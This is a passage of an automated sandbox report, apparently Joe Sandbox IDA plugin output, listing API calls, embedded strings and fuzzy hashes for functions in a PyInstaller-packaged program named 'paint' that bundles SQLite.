                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                • API String ID: 4225454184-272990098
                                                                                                                                                                                                                                                                • Opcode ID: d5db58813692b2099925d77a8811b7dd99f171d082e8c1498eafdd5cd9730581
                                                                                                                                                                                                                                                                • Instruction ID: bb137264011680f95cf635adb805385a8ab4a2e374fdd156011fe04eb74458e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5db58813692b2099925d77a8811b7dd99f171d082e8c1498eafdd5cd9730581
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBD1E3A2B0A78386EB32CB559864AB97B91EB46BC4F544531EE6D037E9DF3CE441D300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                                • Opcode ID: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
                                                                                                                                                                                                                                                                • Instruction ID: 78974113012f1cdc12150d7e2a74623cd279566bab1194e0e8627d6f5cf4ccf3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26D1D073B0AA8686DB60CF15E090BA9B7A5FB85B84F558032DE5D477A8EF3CD900D740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetCurrentProcess.KERNEL32 ref: 00007FF6F0BD8780
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: OpenProcessToken.ADVAPI32 ref: 00007FF6F0BD8793
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetTokenInformation.ADVAPI32 ref: 00007FF6F0BD87B8
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetLastError.KERNEL32 ref: 00007FF6F0BD87C2
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetTokenInformation.ADVAPI32 ref: 00007FF6F0BD8802
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6F0BD881E
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: CloseHandle.KERNEL32 ref: 00007FF6F0BD8836
                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD916C
                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD9175
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                                • Instruction ID: df58461f1ba567b84b3b04b22f6fdbac130d38a3452fa16294b81da0e13de93f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A214F25A09783A1E7509B50E5152EAA366EF86780FC44031EA6ED37D6EF3ED9058780
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB347
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB37D
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3AA
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3BB
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3CC
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3E7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                • Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                                                • Instruction ID: 498e2a346c6e4d6ad3005ace1b4cd4972917cc49782e3d3440c486b9754c78e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8114720B0C642A2FB54A721569253E62569F4A7B0F948774E83FC67DBFE3EB4018305
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                                • API String ID: 4225454184-1987291987
                                                                                                                                                                                                                                                                • Opcode ID: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
                                                                                                                                                                                                                                                                • Instruction ID: 9f56fa31eb0708f923a3df1a0fa7aea87ffac0bc777b2ed9d4f57e541ae69cd9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3C1B162B0AB8385EB148F15A460A7967A1FB56BA4F148235DE7E477F8CF3CE444DB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                                • Opcode ID: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
                                                                                                                                                                                                                                                                • Instruction ID: 88c12a729b85bf37906f1b42e5b8fd1a0e93bb873f21bdd64976359abd9c310e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BA13833B0E6D286D7248B1994A0ABE7B92FB85744F048135DBAE837E9DE3CD154D710
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2063813899
                                                                                                                                                                                                                                                                • Opcode ID: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
                                                                                                                                                                                                                                                                • Instruction ID: 42dd3019495cdd6402977b8804f2fa9f586400db58c33f9bb616eda70b8e7695
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D91E362B0AB8286EB50CF119460AB977A5FB4ABC4F458235DE6D477E9EF3CE440D700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                                • Opcode ID: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
                                                                                                                                                                                                                                                                • Instruction ID: edfc9a98acf154de677c4cadc7c85b3e4d30f03f29710ce013ea656a850b3ecf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C491E362B09AC286D710CB2691A0EBE77A0FB41784F088136DBAD476E9DF3CE555D740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                                • Opcode ID: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
                                                                                                                                                                                                                                                                • Instruction ID: 395cfd74a16b70cd13c81b2a70f2e5444e36a0140747d96b7d2703e47c5f5e75
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44810136B09A828AD7609F25E464BAE77A1FB85784F00C032EB9D477E9CF39D546D700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                • Instruction ID: 849db7d120f753c6d905a6fee6b2a74acd22be8ef9b34388b567b721fa819d15
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE312626B1968162E7209761A8406E7A395BF897D4F800132EE9EC37C5FF3DD146C300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                • Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                                • Instruction ID: 13a9d47979c9959116efc00275545185385d379e74e573f891bde93df243b9cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D31C47660968299EB20DF61F8556F96364FF8A784F800131EE5E87B8AEF3DC104C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6F0BD918F,?,00007FF6F0BD3C55), ref: 00007FF6F0BD2BA0
                                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6F0BD2C2A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                • Instruction ID: db4af9d99140d13ef61edf2c45e588141658d9e87194cf05147acc2d73963dad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D921D166709B81A2E7109B54F8447AA63A5EB89784F800132EA8E9779AEF3DD205C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6F0BD1B99), ref: 00007FF6F0BD2760
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
